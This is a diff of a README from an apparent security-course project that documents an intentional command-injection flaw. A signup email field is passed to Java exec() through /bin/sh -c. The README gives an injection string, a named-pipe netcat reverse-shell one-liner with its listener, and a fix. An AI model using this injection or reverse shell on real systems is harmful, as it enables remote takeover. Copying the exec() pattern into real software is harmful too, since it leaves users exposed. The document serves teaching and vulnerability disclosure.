kimmoal/cybersecuritybase-project/README.md

 URL: http://localhost:8080/signup

 When registering, the user is instructed to input their account details with an valid email address.
 This address will be validated against a one-time authorization code (OTAC) sent to the specified address.
-Email functionality is supposed to be implemented with sendmail, qmail or other mail transfer agent (MTA) executable, but due to the nature of the assignment any mail will not actually be sent.
+Email functionality in `MailService` is supposed to be implemented with sendmail, qmail or other mail transfer agent (MTA) executable, but due to the nature of the assignment any mail will not actually be sent.

-The MTA executable is executed with the Java runtime exec() call within a shell environment, so providing an email address with functional shell script as a suffix will execute the script with the runtime privileges.
+The MTA executable is executed with the Java runtime `exec()` call within a shell environment, so providing an email address with functional shell script as a suffix will execute the script with the runtime privileges.
 Consider the behaviour to be similar with PHPMailer.
 The functionality is intended to be cross-platform, so Windows command interpreter injection should also be possible, but I have not tested this.

 Example email field input sequence for shell: `hello@example.com; touch /tmp/pwned`

 Check the /tmp/ directory for the created file to confirm the vulnerability.

+**Explanation**: when the `exec()` call is made with the String array `{"/bin/sh", "-c", "echo " + account.getEmail()}` the method will execute `/bin/sh -c echo hello@example.com; touch /tmp/pwned`.
+The `-c` will set `/bin/sh` to read and evaluate the commands from the argument list, which now is `echo hello@example.com; touch /tmp/pwned`.
+We can imagine that the `echo` is the MTA executable so this will execute the MTA and the `touch` command in addition, which will create the file `/tmp/pwned`.

+This way we can execute any command in the runtime context.
+We can execute the commands `rm /tmp/shell;mknod /tmp/shell p;nc localhost 10009 0</tmp/shell|/bin/sh 1>/tmp/shell` and in our local machine `nc -v -l 10009`.
+This will create a reverse shell that will take input as commands and output the command output.
+This can be used to download and install your own binaries and conduct additional attacks to other hosts in the network.
+The methods are similar on Windows platforms, but with batch scripting.

 **FIX**: make use of Java's JavaMail API functionality or only accept email addresses with a specific pattern ie. `[a-z0-9\.\-\+]+@[a-z0-9]+\.[a-z]+`